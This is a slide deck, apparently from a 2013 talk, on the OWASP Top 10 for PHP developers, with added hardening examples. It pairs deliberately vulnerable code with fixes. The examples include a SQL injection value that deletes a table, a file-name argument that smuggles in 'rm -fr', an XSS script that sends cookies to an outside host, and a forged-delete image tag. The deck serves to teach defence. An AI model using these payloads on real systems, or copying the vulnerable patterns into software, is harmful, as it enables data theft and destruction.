Follow this topic:
@rjsmelo, #owasp, #php, #appsec
OWASP TOP 10 for PHP programmers
RICARDO MELO
Presented at #PHPLX – 11 September 2013
@rjsmelo 2
RICARDO MELO
● CTO @ DRI
● PHP, MySQL, Linux and lots of other OSS
● ZCE, RHCE, LPI 3, ITIL, etc.
● +10 years building (and breaking) things
About
● 14-year-old academic spin-off
● Pragmatic OSS orientation
● PHP, MySQL, SugarCRM, Drupal, JavaScript, Linux, etc.
● Crafters, integrators
● Always looking for software developers – yes, right now!
1999 - 2013 DRI. Some Rights Reserved
.
4
Outline
● OWASP
● OWASP TOP 10
● What's Next
● Conclusions
What is OWASP?
● Open Web Application Security Project
● Worldwide not-for-profit
● Focus on security improvement and awareness
● Very active community
● Lots of projects (you can start yours)
What is OWASP TOP 10
● The name is “The Top 10 Most Critical Web Application Risks”
● The focus is awareness
● Released 2003, 2004, 2007, 2010 and 2013
https://www.owasp.org/index.php/Top_10_2013
Risk?

Threat Agents        | Attack Vectors | Weakness Prevalence | Weakness Detectability | Technical Impacts | Business Impacts
---------------------+----------------+---------------------+------------------------+-------------------+---------------------------------
Application specific | EASY           | WIDESPREAD          | EASY                   | SEVERE            | Application / business specific
                     | AVERAGE        | COMMON              | AVERAGE                | MODERATE          |
                     | DIFFICULT      | UNCOMMON            | DIFFICULT              | MINOR             |
OWASP TOP 10 - 2013
● A1 – Injection
● A2 – Broken Authentication and Session Management
● A3 – Cross-site Scripting (XSS)
● A4 – Insecure Direct Object References
● A5 – Security Misconfiguration
● A6 – Sensitive Data Exposure
● A7 – Missing Function Level Access Control
● A8 – Cross Site Request Forgery (CSRF)
● A9 – Using Components with Known Vulnerabilities
● A10 – Unvalidated Redirects and Forwards
A1 - Injection
● Occurs when untrusted data is sent directly to the interpreter!
● Not only SQL: NoSQL, LDAP, OS, XML, XPath!
● Never, NEVER trust ANY input!
A1 – Injection Examples - SQL
<?php
// Vulnerable: prone to SQL injection, the request value is pasted into the statement
// script.php?start_record=20
$db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password');
$stmt = $db->query(
    "SELECT * FROM some_table LIMIT "
    . $_REQUEST['start_record']
    . ",10");
$result = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo function_to_render_result($result);
// what if I set start_record = "1; delete from some_table; -- "

<?php
// Fixed: prepared statement, the value travels as a bound parameter
// script.php?start_record=20
$db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password');
$stmt = $db->prepare("SELECT * FROM some_table LIMIT ?,10");
// LIMIT needs an integer: bind it as PDO::PARAM_INT, otherwise an emulated
// prepare would send LIMIT '20',10 and MySQL would reject the statement
$stmt->bindValue(1, (int) $_REQUEST['start_record'], PDO::PARAM_INT);
$stmt->execute();
$result = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo function_to_render_result($result);
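A prepared statement only protects the values it binds. Column names, the ASC/DESC keyword and (with emulated prepares) LIMIT/OFFSET cannot be bound, so a listing page that lets the user pick sort order and page needs a whitelist and an integer cast for those parts. The following is an added example, not code from the slides; it assumes PHP 7 or later and a some_table(id, name, created_at), and the whitelist and request parameters are constructed for the illustration.

```php
<?php
// Added example, not from the slides: placeholders for values, a whitelist
// for identifiers and keywords, and PDO::PARAM_INT for LIMIT/OFFSET.
// Assumes PHP >= 7.0 and a table some_table(id, name, created_at).

const SORTABLE_COLUMNS = ['id', 'name', 'created_at']; // constructed whitelist
const PAGE_SIZE = 10;

function fetchPage(PDO $db, array $request): array
{
    // 1. Identifier: chosen from a closed list, never copied from the request
    $sort   = $request['sort'] ?? 'id';
    $column = in_array($sort, SORTABLE_COLUMNS, true) ? $sort : 'id';

    // 2. Keyword: only two spellings can reach the statement
    $direction = (($request['dir'] ?? 'asc') === 'desc') ? 'DESC' : 'ASC';

    // 3. Numbers: cast to int and bound as PDO::PARAM_INT; a string-bound
    //    value would become LIMIT '20', 10 under emulated prepares
    $offset = max(0, (int) ($request['start_record'] ?? 0));

    // 4. Free text: a real parameter. % and _ are LIKE wildcards, which can
    //    only widen the match, never change the statement
    $needle = '%' . ($request['q'] ?? '') . '%';

    $sql = "SELECT id, name, created_at FROM some_table"
         . " WHERE name LIKE :needle"
         . " ORDER BY `$column` $direction"   // both pieces came from steps 1 and 2
         . " LIMIT :offset, :count";

    $stmt = $db->prepare($sql);
    $stmt->bindValue(':needle', $needle, PDO::PARAM_STR);
    $stmt->bindValue(':offset', $offset, PDO::PARAM_INT);
    $stmt->bindValue(':count', PAGE_SIZE, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage, e.g. script.php?start_record=20&sort=name&dir=desc&q=smith
$db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION, // fail loudly instead of echoing SQL errors
    PDO::ATTR_EMULATE_PREPARES => false,                  // let the server prepare the statement
]);
print_r(fetchPage($db, $_REQUEST));
```

With the whitelist in place a request such as sort=name;DROP TABLE falls back to the id column, and start_record="1; delete from some_table; -- " becomes the integer 1, so neither ever reaches MySQL as SQL text.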
A1 - Injection Samples - OS
<?php
// Vulnerable: the file name is handed to the shell unescaped (OS command injection)
// script.php?file=xpto.pdf
$fileType = exec("file " . $_REQUEST['file']);
echo $fileType;
// but one can try with "xpto.pdf; rm -fr /some/folder"

<?php
// Fixed: escapeshellarg() wraps the value in single quotes, so the shell sees
// one argument and never a command separator
// script.php?file=xpto.pdf
$fileType = exec("file " . escapeshellarg($_REQUEST['file']));
echo $fileType;
A2 – Broken Authentication and Session Management
● Broken implementations allow an attacker to assume another user's identity!
● Can be session hijacking or session fixation
● Broken authentication
● Or other failures that lead to compromised passwords, keys or session tokens
A2 – Session Fixation
<?php
// Vulnerable: prone to session fixation, the session id in use before login
// (possibly one the attacker handed to the victim) stays valid after login
// [ ... ]
$userDetails = check_credentials($username, $password);
if ( $userDetails !== false ) {
    $_SESSION['userIsLoggedin'] = true;
    $_SESSION['userInformation'] = $userDetails;
}
// [ ... ]

<?php
// Fixed: a fresh session id is issued at the moment privileges change
// [ ... ]
$userDetails = check_credentials($username, $password);
if ( $userDetails !== false ) {
    session_regenerate_id(true); // true also deletes the old session's data
    $_SESSION['userIsLoggedin'] = true;
    $_SESSION['userInformation'] = $userDetails;
}
// [ ... ]
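Regenerating the id on login is one piece; the cookie that carries the id and the lifetime of the session also decide whether a hijacked or fixated session is usable. The following is an added example, not code from the slides: a login/logout pair that sets the cookie flags, rejects ids the server never issued and enforces an idle timeout. It assumes PHP 7.3 or later (array form of session_set_cookie_params and setcookie) and the slides' check_credentials() returning an array or false; the timeout value is a constructed choice.

```php
<?php
// Added example, not from the slides: session start, login and logout with
// cookie flags, strict mode, id regeneration and an idle timeout.
// Assumes PHP >= 7.3 and the slides' check_credentials($username, $password).

const IDLE_TIMEOUT = 900; // seconds, constructed value

function startSecureSession(): void
{
    if (session_status() === PHP_SESSION_ACTIVE) {
        return;
    }
    ini_set('session.use_strict_mode', '1');  // ids the server did not issue are not adopted
    ini_set('session.use_only_cookies', '1'); // never accept a session id from the URL
    session_set_cookie_params([
        'lifetime' => 0,       // session cookie, dies with the browser
        'path'     => '/',
        'domain'   => '',
        'secure'   => true,    // only sent over HTTPS
        'httponly' => true,    // not readable through document.cookie (see A3)
        'samesite' => 'Lax',   // not sent on cross-site POST requests (see A8)
    ]);
    session_start();

    // Idle timeout: a session nobody used for IDLE_TIMEOUT seconds is discarded
    if (isset($_SESSION['lastActivity'])
        && time() - $_SESSION['lastActivity'] > IDLE_TIMEOUT) {
        logout();
        session_start();       // continue with a fresh, anonymous session
    }
    $_SESSION['lastActivity'] = time();
}

function login(string $username, string $password): bool
{
    $userDetails = check_credentials($username, $password);
    if ($userDetails === false) {
        return false;
    }
    // New id, old one deleted: a pre-login id is never promoted to logged-in
    session_regenerate_id(true);
    $_SESSION['userIsLoggedin']  = true;
    $_SESSION['userInformation'] = $userDetails;
    $_SESSION['lastActivity']    = time();
    return true;
}

function logout(): void
{
    $_SESSION = [];
    // Remove the cookie on the client, not only the data on the server
    $params = session_get_cookie_params();
    setcookie(session_name(), '', [
        'expires'  => time() - 3600,
        'path'     => $params['path'],
        'domain'   => $params['domain'],
        'secure'   => $params['secure'],
        'httponly' => $params['httponly'],
        'samesite' => $params['samesite'],
    ]);
    session_destroy();
}

// Usage in a login handler
startSecureSession();
if (login($_POST['username'] ?? '', $_POST['password'] ?? '')) {
    header('Location: /home');
} else {
    http_response_code(401);
}
```

use_strict_mode is what closes the fixation door on its own: an attacker-chosen id that the server never generated is simply replaced, whether or not the application remembers to regenerate.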
A3 – Cross-Site Scripting (XSS)
● Whenever untrusted data is sent to the browser without proper validation and escaping!
● XSS allows the attacker to OWN the victim's browser and do ... everything!
● Stored, reflected and DOM-based XSS
A3 – steal user cookie
<?php
// Vulnerable: page prone to XSS, the search term is echoed back unescaped
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?= $_REQUEST['search']; ?></p>
<?= render_results($results); ?>
</body>
</html>
// set search to:
"<script>document.location='http://www.example.com/precious_cookie?cookie='+document.cookie</script>"

<?php
// Fixed: the term is HTML-encoded before it reaches the browser.
// ENT_COMPAT leaves single quotes alone, which is fine for text inside <p>;
// use ENT_QUOTES when the value lands inside an attribute
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?= htmlentities($_REQUEST['search'], ENT_COMPAT | ENT_HTML401, 'UTF-8'); ?></p>
<?= render_results($results); ?>
</body>
</html>
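The slide escapes for one context, the HTML body. The same value often ends up in an attribute, a URL and a script block on the same page, and each needs its own encoding. The following is an added example, not code from the slides: one helper per output context and a page that uses all of them. It assumes PHP 7 or later; the search string and result rows are constructed samples.

```php
<?php
// Added example, not from the slides: context-aware output escaping.
// Assumes PHP >= 7.0 (ENT_HTML5 and the JSON_HEX_* flags exist since 5.4).

function e(string $s): string
{
    // HTML body and quoted attributes. ENT_QUOTES also encodes ' so the value
    // cannot close a single-quoted attribute; ENT_SUBSTITUTE keeps invalid
    // UTF-8 from turning the whole output into an empty string
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function js($value): string
{
    // Inside <script>: a JSON literal. The HEX flags turn < > & ' " into
    // \u00XX, so a "</script>" inside the data cannot end the block
    return json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

function urlParam(string $s): string
{
    // One query-string value; the complete URL is then escaped as an attribute
    return rawurlencode($s);
}

function renderSearchPage(string $search, array $results): string
{
    $out  = "<html><body>\n";
    // HTML body context
    $out .= '<p>results for : ' . e($search) . "</p>\n";
    // Attribute context: quotes are encoded, so no break-out from value="..."
    $out .= '<input type="text" name="search" value="' . e($search) . "\">\n";
    // URL context: encode the value, then the URL as an attribute
    $out .= '<a href="' . e('script.php?page=2&search=' . urlParam($search)) . "\">next</a>\n";
    // JavaScript context: a JSON literal, never string concatenation
    $out .= '<script>var lastSearch = ' . js($search) . ";</script>\n";
    $out .= "<ul>\n";
    foreach ($results as $row) {
        // Data read back from storage is untrusted as well (stored XSS)
        $out .= '<li>' . e($row['title']) . "</li>\n";
    }
    $out .= "</ul>\n</body></html>\n";
    return $out;
}

// Usage with a constructed hostile search string and constructed rows
$search  = '"><script>alert(document.cookie)</script>';
$results = [['title' => 'hello <world>'], ['title' => "o'reilly"]];
echo renderSearchPage($search, $results);
```

Running it shows the payload rendered as harmless text in every position: the body and attribute carry &quot;&gt;&lt;script&gt;..., the href carries the percent-encoded form, and the script block carries a JSON string with \u003C and \u003E in place of the angle brackets.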
A4 – Insecure Direct Object Reference
● Whenever a developer exposes references to internal objects without proper access control.
● Attackers can change the references and access resources that shouldn't be accessible.
A4 – Access other user account
<?php
// Vulnerable: prone to insecure direct object reference, any account id is served
// script.php?account=10
$accountId = intval($_REQUEST['account']);
$account = new Account($accountId);
echo render_account_info($account);
// and if I change account to "9" ?

<?php
// Fixed: the account is rendered only if the logged-in user may read it
// script.php?account=10
$user = new User($_SESSION['userInfo']);
$accountId = intval($_REQUEST['account']);
$account = new Account($accountId);
if ( $account->canRead($user) ) {
    echo render_account_info($account);
} else {
    echo "Access denied";
}
A5 – Security Misconfiguration
● Failing to secure the full stack often leads to the application or servers being compromised.
● Take into consideration other services / applications running in the same infrastructure
● Watch out for outdated software
● Watch out for default accounts
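Default settings are the PHP-level version of the default accounts the slide warns about. The following is an added example, not code from the slides: a self-check of php.ini directives that often ship in their permissive state. The expected values are common hardening choices and an assumption of this example, not a recommendation from the slides; run it under the web SAPI, because the CLI reads a different php.ini.

```php
<?php
// Added example, not from the slides: report php.ini directives that differ
// from a hardened baseline. The baseline below is an assumption of this example.

function auditPhpConfig(): array
{
    $expected = [
        'display_errors'           => '0', // errors go to the log, not to the visitor
        'expose_php'               => '0', // no "X-Powered-By: PHP/x.y.z" header
        'allow_url_include'        => '0', // include() of remote URLs stays off
        'allow_url_fopen'          => '0', // tighten unless the app really needs it
        'session.cookie_httponly'  => '1', // session cookie hidden from JavaScript
        'session.cookie_secure'    => '1', // session cookie only over HTTPS
        'session.use_strict_mode'  => '1', // unknown session ids are not adopted
        'session.use_only_cookies' => '1', // no session id in the URL
    ];

    $findings = [];
    foreach ($expected as $directive => $want) {
        $have = ini_get($directive);
        if ($have === false) {
            $findings[] = "$directive: directive not known to this PHP build";
            continue;
        }
        // ini_get returns the raw text: "", "0", "1", "On", "Off", ...
        $isOn = in_array(strtolower(trim((string) $have)), ['1', 'on', 'true', 'yes'], true);
        if (($isOn ? '1' : '0') !== $want) {
            $findings[] = sprintf('%s is "%s", expected %s',
                $directive, $have, $want === '1' ? 'On' : 'Off');
        }
    }
    return $findings;
}

// Usage: an empty list means every checked directive matches the baseline
$findings = auditPhpConfig();
echo $findings ? implode("\n", $findings) . "\n" : "no findings\n";
```

The same idea scales to the rest of the stack: a checklist that is executed, not read, is what catches the forgotten default after the next deployment.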
A6 – Sensitive Data Exposure
● Whenever sensitive data isn't properly protected, allowing attackers to steal or modify that information.
● Credit card fraud, identity theft, etc.!
● Be aware: data should be protected both in transit and at rest in the storage engine (don't forget the backups)
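The most common piece of sensitive data a PHP application stores is the password column, and a backup of that table is exactly the copy the slide warns about. The following is an added example, not code from the slides: passwords stored as bcrypt hashes with PHP's password_hash() family, a dummy verification so unknown usernames cost the same time as wrong passwords, and a transparent re-hash when the cost is raised. It assumes PHP 7 or later; the array stands in for the database and the user is constructed.

```php
<?php
// Added example, not from the slides: credential storage that survives a
// leaked table or backup. Assumes PHP >= 7.0; $users stands in for the database.

function createUser(array &$users, string $username, string $password): void
{
    // PASSWORD_DEFAULT is bcrypt today; PHP generates a random salt per call.
    // Never md5()/sha1(), with or without a fixed salt
    $users[$username] = ['hash' => password_hash($password, PASSWORD_DEFAULT)];
}

function checkLogin(array &$users, string $username, string $password): bool
{
    static $dummyHash = null;
    if ($dummyHash === null) {
        $dummyHash = password_hash('dummy-password', PASSWORD_DEFAULT);
    }
    if (!isset($users[$username])) {
        // Verify against a dummy so an unknown name takes as long as a wrong
        // password; the response time then does not reveal which names exist
        password_verify($password, $dummyHash);
        return false;
    }
    $hash = $users[$username]['hash'];
    if (!password_verify($password, $hash)) {
        return false;
    }
    // Re-hash at login when the algorithm or cost has been raised since the
    // hash was made; this is the only moment the plaintext is available
    if (password_needs_rehash($hash, PASSWORD_DEFAULT)) {
        $users[$username]['hash'] = password_hash($password, PASSWORD_DEFAULT);
    }
    return true;
}

// Usage with constructed data
$users = [];
createUser($users, 'alice', 'correct horse battery staple');
echo checkLogin($users, 'alice', 'correct horse battery staple') ? "ok\n" : "denied\n";
echo checkLogin($users, 'alice', 'wrong') ? "ok\n" : "denied\n";
echo checkLogin($users, 'nobody', 'anything') ? "ok\n" : "denied\n";
```

The hash column is the only thing that ends up in the database and therefore in the backups; the in-transit half of the slide's advice is TLS on every connection that carries the plaintext, including the one between the web tier and the database.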
A7 – Missing Function Level Access Control
● Most applications validate function-level access control before displaying options in the UI, but fail to validate it when the function is actually accessed.
● An attacker can forge requests to functions that shouldn't be available
A7 – insecure function
<?php
// Vulnerable: prone to insecure function access, every action runs for anyone
// script.php?user=john&action=read
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$user = new User($userId);
switch ($action) {
    case 'read':
        echo render_user($user);
        break;
    case 'delete':
        $user->delete();
        echo "user Deleted";
        break;
}
// and if I change action to "delete"?

<?php
// Fixed: each action checks the logged-in user's permission before running
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$loggedUser = new AppUser($_SESSION['userInfo']);
$user = new User($userId);
switch ($action) {
    case 'read':
        if ( $user->canRead($loggedUser) ) {
            echo render_user($user);
        }
        break;
    case 'delete':
        if ( $user->canDelete($loggedUser) ) {
            $user->delete();
            echo "user Deleted";
        }
        break;
}
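The A4 and A7 fixes above add a check inside each branch, which works until someone adds a branch and forgets the check. The following is an added example, not code from the slides, covering both slides at once: a deny-by-default dispatcher where every action must be listed in a policy table with the role it needs (A7), and the object-level ownership check (A4) runs before any handler. It assumes PHP 7 or later; the users, accounts and requests are constructed in-memory samples, not the slides' User, Account or AppUser classes.

```php
<?php
// Added example, not from the slides: deny-by-default authorization that
// combines function-level (A7) and object-level (A4) checks in one place.
// Assumes PHP >= 7.0. All data below is constructed.

// Policy: action => role required. An action missing here is refused.
const ACTION_POLICY = [
    'read'   => 'user',
    'delete' => 'admin',
];

// Constructed sample data standing in for the database
$users = [
    1 => ['id' => 1, 'role' => 'user'],
    2 => ['id' => 2, 'role' => 'admin'],
];
$accounts = [
    9  => ['id' => 9,  'owner' => 1, 'balance' => 100],
    10 => ['id' => 10, 'owner' => 2, 'balance' => 250],
];

function authorize(array $caller, string $action, array $object): bool
{
    // Function level (A7): unknown action or insufficient role -> deny
    if (!array_key_exists($action, ACTION_POLICY)) {
        return false;
    }
    if (ACTION_POLICY[$action] === 'admin' && $caller['role'] !== 'admin') {
        return false;
    }
    // Object level (A4): a plain user may only touch their own account
    if ($caller['role'] !== 'admin' && $object['owner'] !== $caller['id']) {
        return false;
    }
    return true;
}

function dispatch(array $request, array $caller, array &$accounts): string
{
    $id     = (int) ($request['account'] ?? 0);
    $action = (string) ($request['action'] ?? '');
    // Same answer for "does not exist" and "not yours": the id space is not
    // enumerable through the difference in messages
    if (!isset($accounts[$id]) || !authorize($caller, $action, $accounts[$id])) {
        return 'Access denied';
    }
    switch ($action) {
        case 'read':
            return 'balance: ' . $accounts[$id]['balance'];
        case 'delete':
            unset($accounts[$id]);
            return 'account deleted';
    }
    return 'Access denied'; // unreachable: every policy key has a case above
}

// Usage: user 1 reads their own account, then tries account 10 and a delete;
// admin 2 deletes account 9
echo dispatch(['account' => 9,  'action' => 'read'],   $users[1], $accounts), "\n";
echo dispatch(['account' => 10, 'action' => 'read'],   $users[1], $accounts), "\n";
echo dispatch(['account' => 9,  'action' => 'delete'], $users[1], $accounts), "\n";
echo dispatch(['account' => 9,  'action' => 'delete'], $users[2], $accounts), "\n";
echo dispatch(['account' => 9,  'action' => 'export'], $users[2], $accounts), "\n";
```

The last call shows the point of the table: an action that exists in the code but not in the policy is refused even for the admin, so a forgotten entry fails closed instead of open.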
A8 – Cross Site Request Forgery (CSRF)
● CSRF forces a victim's browser to send a forged HTTP request to a vulnerable web application (normally taking advantage of an existing user session)
● The forged request is indistinguishable from a user-generated one!
A8 – delete user
<?php
// Vulnerable app: the permission check passes because the victim's own
// session cookie travels with the forged request
// delete.php?id=123
$id = intval($_REQUEST['id']);
$user = new User($id);
$loggedUser = new AppUser($_SESSION['userInfo']);
if ( $user->canDelete($loggedUser) ) {
    $user->delete();
}
?>
// attacker's site:
<img src="http://www.example.com/users/delete.php?id=123" />

<?php
// Fixed app: the request must also carry a token that only the real form knows
$id = intval($_REQUEST['id']);
$user = new User($id);
$loggedUser = new AppUser($_SESSION['userInfo']);
if (isset($_REQUEST['token']) && validate_token($_REQUEST['token'])) {
    if ( $user->canDelete($loggedUser) ) {
        $user->delete();
    }
}
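The slide calls validate_token() without showing it. The following is an added example, not code from the slides: one way to implement it, together with the helper that places the token in the form and a delete handler that also insists on POST, so an <img> from another site can produce neither the method nor the token. It assumes PHP 7 or later (random_bytes) and a started session; the delete step is passed in as a callable so the handler does not depend on the slides' User and AppUser classes, and the session and requests at the bottom are constructed.

```php
<?php
// Added example, not from the slides: per-session anti-CSRF token.
// Assumes PHP >= 7.0 and that session_start() has already run.

function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        // 32 bytes from the CSPRNG, hex-encoded, one token per session
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field(): string
{
    // Hidden input for every state-changing form
    return '<input type="hidden" name="token" value="'
         . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

function validate_token($submitted): bool
{
    if (!is_string($submitted) || empty($_SESSION['csrf_token'])) {
        return false;
    }
    // Constant-time comparison; a plain === leaks through timing
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// delete.php, fixed: POST only and a valid token, then the usual canDelete()
// check inside $deleteIfAllowed. Returns the HTTP status to send.
function handleDelete(string $method, array $post, callable $deleteIfAllowed): int
{
    if ($method !== 'POST' || !validate_token($post['token'] ?? null)) {
        return 403;
    }
    $deleteIfAllowed((int) ($post['id'] ?? 0));
    return 200;
}

// Usage outside a web server, with a constructed session
$_SESSION = [];
$form = '<form method="post" action="delete.php">' . csrf_field()
      . '<input type="hidden" name="id" value="123"><button>delete</button></form>';
$deleted  = [];
$doDelete = function (int $id) use (&$deleted) { $deleted[] = $id; };

// Forged cross-site request, as the <img> on the slide would send it: GET, no token
$forged = handleDelete('GET', ['id' => '123'], $doDelete);
// Forged POST from a cross-site <form>: the attacker cannot read the token
$forgedPost = handleDelete('POST', ['id' => '123', 'token' => 'guess'], $doDelete);
// Legitimate submission of the form rendered above
$genuine = handleDelete('POST', ['id' => '123', 'token' => csrf_token()], $doDelete);

echo "forged GET: $forged, forged POST: $forgedPost, genuine: $genuine, deletions: "
   . count($deleted) . "\n";
```

The token is tied to the session, so a value captured from one user's form is useless in another user's browser; the SameSite cookie attribute from the A2 example is a second, independent layer, not a replacement for the token.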
A9 – Using Components with Known Vulnerabilities
● Whenever you use libraries, frameworks, or other software modules with known vulnerabilities.
● Attackers can leverage these issues to attack your application / server / etc.
A10 – Unvalidated Redirects and Forwards
● Web applications often redirect users to other pages, using untrusted data to determine the destination page.
● Attackers can redirect victims to phishing or malware pages, or use forwards to access unauthorized pages.
A10 – “simple” Forward
<?php
// Vulnerable: the forward reaches any method of the controller, destroyAction
// included, without the access check that preFunction runs for a normal action
class someController extends baseController {
    public function preFunction($args, $action)
    {
        $this->checkAccess($args, $action);
    }

    public function indexAction($args)
    {
        // [...] do something here that builds $response
        if ( !empty($args['callback']) && method_exists($this, $args['callback']) ) {
            $callback = $args['callback'];   // keep the name before unsetting it
            unset($args['callback']);
            call_user_func_array(array($this, $callback), $args);
        }
        return $response;
    }

    public function destroyAction($args)
    {
        $this->selfTerminate();
    }
}

// Fixed: run the access check for the forwarded action before calling it
if ( !empty($args['callback']) && method_exists($this, $args['callback']) ) {
    $callback = $args['callback'];
    $this->preFunction($args, $callback);
    unset($args['callback']);
    call_user_func_array(array($this, $callback), $args);
}
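The slide covers the forward; the redirect half of A10 needs the destination validated before the Location header is sent, and the forward is safer still when it dispatches from an allow-list rather than from whatever method_exists() finds. The following is an added example, not code from the slides: a redirect target check that handles the usual bypass shapes (protocol-relative //host, backslash paths, foreign schemes, userinfo tricks) and a controller that only forwards to named actions. It assumes PHP 7 or later; the host list, controller and sample targets are constructed.

```php
<?php
// Added example, not from the slides: validated redirects and an allow-listed
// forward. Assumes PHP >= 7.0. Hosts and sample targets are constructed.

const ALLOWED_HOSTS  = ['www.example.com', 'example.com'];
const DEFAULT_TARGET = '/';

function safeRedirectTarget(string $target, array $allowedHosts = ALLOWED_HOSTS): string
{
    $target = trim($target);
    // Same-site path: exactly one leading slash and no backslash anywhere.
    // Browsers read "//evil" and "/\evil" as host-relative, so both are excluded
    if (preg_match('#^/(?![/\\\\])[^\\\\]*$#', $target)) {
        return $target;
    }
    $parts = parse_url($target);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return DEFAULT_TARGET;          // "javascript:..." and malformed input
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return DEFAULT_TARGET;
    }
    // parse_url puts "www.example.com@evil" into 'user', so 'host' is the real host
    if (!in_array(strtolower($parts['host']), $allowedHosts, true)) {
        return DEFAULT_TARGET;          // foreign host: do not follow it
    }
    return $target;
}

function redirectTo(string $untrusted): void
{
    header('Location: ' . safeRedirectTarget($untrusted), true, 302);
    exit;
}

// Forward: only names in the allow-list are callable, so destroyAction cannot
// be reached through ?callback=destroyAction even though the method exists
class ReportController
{
    const FORWARDABLE = ['summaryAction', 'detailAction'];

    public function forward(array $args): string
    {
        $callback = $args['callback'] ?? '';
        if (!in_array($callback, self::FORWARDABLE, true)) {
            return 'Unknown callback';
        }
        unset($args['callback']);
        return $this->$callback($args);
    }
    public function summaryAction(array $args): string { return 'summary'; }
    public function detailAction(array $args): string  { return 'detail for ' . (int) ($args['id'] ?? 0); }
    public function destroyAction(array $args): string { return 'destroyed'; } // not forwardable
}

// Usage: constructed targets, the first and third are accepted, the rest fall back to "/"
foreach (['/account/settings', '//evil.example/', 'https://www.example.com/help',
          'https://evil.example/', 'javascript:alert(1)', '/\\evil.example',
          'https://www.example.com@evil.example/'] as $t) {
    echo str_pad($t, 40) . ' -> ' . safeRedirectTarget($t) . "\n";
}
$c = new ReportController();
echo $c->forward(['callback' => 'detailAction', 'id' => '7']), "\n";
echo $c->forward(['callback' => 'destroyAction']), "\n";
```

Falling back to a fixed page rather than refusing the request keeps the login-then-return flow working for users while giving a phishing link nothing to point at.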
What's Next For PHP Programmers
● OWASP
– http://goo.gl/lVRRY
● Cheat Sheets
– http://goo.gl/lVRRY
● OWASP Zed Attack Proxy
– http://goo.gl/QE5v1H
● OWASP Books – free
– http://goo.gl/aLx1q2
Conclusions
● Keeping the application secure is a continuous process
● Avoiding the TOP 10 risks doesn't make your application secure, but it is already a HUGE step forward.
● Don't trust ANY input! Escape every output!
Thank you
Follow this topic:
@rjsmelo, #owasp, #php, #appsec
QA
Feedback: https://joind.in/9107
www.dri-global.com
@rjsmelo
ricardo.melo@dri-global.com
